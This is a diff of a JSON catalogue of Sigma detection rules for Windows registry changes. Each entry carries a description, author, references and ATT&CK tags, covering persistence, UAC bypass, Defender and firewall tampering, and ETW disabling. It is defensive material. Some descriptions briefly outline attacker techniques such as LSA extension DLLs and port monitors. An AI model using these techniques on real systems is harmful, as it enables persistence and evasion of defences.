+ "value": "Powershell in Windows Run Keys"
+ },
+ {
+ "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder",
+ "meta": {
+ "author": "Florian Roth, oscd.community",
+ "creation_date": "2018/07/18",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_susp_reg_persist_explorer_run.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11",
+ "value": "Registry Persistence via Explorer Run Key"
+ },
+ {
+ "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to 
be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/21",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc",
+ "value": "Persistence Via Disk Cleanup Handler - Autorun"
+ },
+ {
+ "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/09",
+ "falsepositive": [
+ "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for"
+ ],
+ "filename": "registry_set_persistence_mycomputer.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06",
+ "value": "Persistence Via MyComputer Key and SubKeys"
+ },
+ {
+ "description": "Detects 
suspicious new RUN key element pointing to an executable in a suspicious folder",
+ "meta": {
+ "author": "Florian Roth, Markus Neis, Sander Wiebing",
+ "creation_date": "2018/08/25",
+ "falsepositive": [
+ "Software using weird folders for updates"
+ ],
+ "filename": "registry_set_susp_run_key_img_folder.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588",
+ "value": "New RUN Key Pointing to Suspicious Folder"
+ },
+ {
+ "description": "Detects the abuse of custom file open handler, executing powershell",
+ "meta": {
+ "author": "CD_R0M_",
+ "creation_date": "2022/06/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_custom_file_open_handler_powershell_execution.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ]
+ },
+ "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc",
+ "value": "Custom File Open Handler Executes PowerShell"
+ },
+ {
+ "description": "Detect the creation of a service with a service binary located in a suspicious directory",
+ "meta": {
+ "author": "Florian Roth, frack113",
+ "creation_date": "2022/05/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_creation_service_susp_folder.yml",
+ 
"level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47",
+ "value": "Service Binary in Suspicious Folder"
+ },
+ {
+ "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/11/18",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_net_cli_ngenassemblyusagelog.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "28036918-04d3-423d-91c0-55ecf99fb892",
+ "value": "NET NGenAssemblyUsageLog Registry Key Tamper"
+ },
+ {
+ "description": "Change outlook email security settings",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/28",
+ "falsepositive": [
+ "Administrative scripts"
+ ],
+ "filename": "registry_set_outlook_security.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ 
"logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1137"
+ ]
+ },
+ "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a",
+ "value": "Change Outlook Security Setting in Registry"
+ },
+ {
+ "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
+ "meta": {
+ "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)",
+ "creation_date": "2019/10/25",
+ "falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason",
+ "Legitimate administrator sets up autorun keys for legitimate reason"
+ ],
+ "filename": "registry_set_asep_reg_keys_modification_common.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99",
+ "value": "Common Autorun Keys Modification"
+ },
+ {
+ "description": "Detects changes to the \"ExtErrorInformation\" key in order to 
disable ETW logging for rpcrt4.dll", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_rpcrt4_etw_tamper.yml", + "level": "low", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ] + }, + "uuid": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "value": "ETW Logging Disabled For rpcrt4.dll" + }, + { + "description": "Detects when a new custom protocole handler is registered", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/30", + "falsepositive": [ + "Legitimate applications registering a new custom protocol handler" + ], + "filename": "registry_set_register_custom_protocol_handler.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "value": "Newly Registered Protocol Handler" + }, + { + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitmate use of the feature (alerts should be investigated either way)" + ], + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "value": "Allow RDP Remote Assistance Feature" + }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_natural_language_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_natural_language_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Add DLLPathOverride Entry For Persistence" + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "meta": { + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/08/06", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "filename": "registry_set_terminal_server_tampering.yml", + "level": "high", + 
"logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "value": "RDP Sensitive Settings Changed" + }, + { + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_port_monitor.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "value": 
"Add Port Monitor Persistence in Registry" + }, + { + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_lsa_extension_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1476286368385019906", + "https://persistence-info.github.io/Data/lsaaextension.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "value": "Persistence Via LSA Extensions" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_office.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "value": "Office Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "value": "Wow6432Node Classes Autorun Keys Modification" + }, + { + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate 
admin script" + ], + "filename": "registry_set_hide_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", + "value": "Registry Hide Function from User" + }, + { + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2020/05/31", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ] + }, + "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)" + }, + { + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "creation_date": "2020/04/14", + "falsepositive": [ + "Some installed utilities (i.e. 
OneDrive) may serve new COM objects at user-level" + ], + "filename": "registry_set_persistence_search_order.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", + "https://attack.mitre.org/techniques/T1546/015/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "value": "Windows Registry Persistence COM Search Order Hijacking" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "value": "UAC Bypass Using Windows Media Player - Registry" + }, + { + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_policies_attachments_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "value": "Modify Attachment Manager Settings - Attachments" }, { "description": "Detects the Setting of Windows Defender Exclusions", 
@@ -20307,170 +13964,8534 @@
  "falsepositive": [
  "Administrator actions"
  ],
- "filename": "win_defender_exclusions.yml",
+ "filename": "registry_set_defender_exclusions.yml",
  "level": "medium",
- "logsource.category": "No established category",
+ "logsource.category": "registry_set",
  "logsource.product": "windows",
  "refs": [
  "https://twitter.com/_nullbind/status/1204923340810543109",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml"
  ],
  "tags": [
  "attack.defense_evasion",
  "attack.t1562.001"
  ]
  },
- "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f",
- "value": "Windows Defender Exclusions Added"
+ "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529",
+ "value": "Windows Defender Exclusions Added - Registry"
  },
  {
- "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"",
+ "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/09/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_change_winevt_channelaccess.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
+ "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.002"
+ ]
+ },
+ "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c",
+ "value": "Change Winevt Event Access Permission Via Registry"
+ },
+ {
+ "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
+ "meta": {
+ "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
+ "creation_date": "2019/10/25",
+ "falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason",
+ "Legitimate administrator sets up autorun keys for legitimate reason"
+ ],
+ "filename": "registry_set_asep_reg_keys_modification_winsock2.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565",
+ "value": "WinSock2 Autorun Keys Modification"
+ },
+ {
+ "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/07/04",
+ "falsepositive": [
+ "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)"
+ ],
+ "filename": "registry_set_disabled_microsoft_defender_eventlog.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157",
+ "value": "Disabled Windows Defender Eventlog"
+ },
+ {
+ "description": "Detect set EnableFirewall to 0 to disable the windows firewall",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/08/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_disable_windows_firewall.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.004"
+ ]
+ },
+ "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0",
+ "value": "Disable Windows Firewall by Registry"
+ },
+ {
+ "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/08/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_add_hidden_user.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.002"
+ ]
+ },
+ "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a",
+ "value": "User Account Hidden By Registry"
+ },
+ {
+ "description": "Attempts to detect system changes made by Blue Mockingbird",
+ "meta": {
+ "author": "Trent Liffick (@tliffick)",
+ "creation_date": "2020/05/14",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_mal_blue_mockingbird.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1112",
+ "attack.t1047"
+ ]
+ },
+ "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27",
+ "value": "Blue Mockingbird - Registry"
+ },
+ {
+ "description": "Detect the creation of a service with a service binary located in a uncommon directory",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/05/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_creation_service_uncommon_folder.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ]
+ },
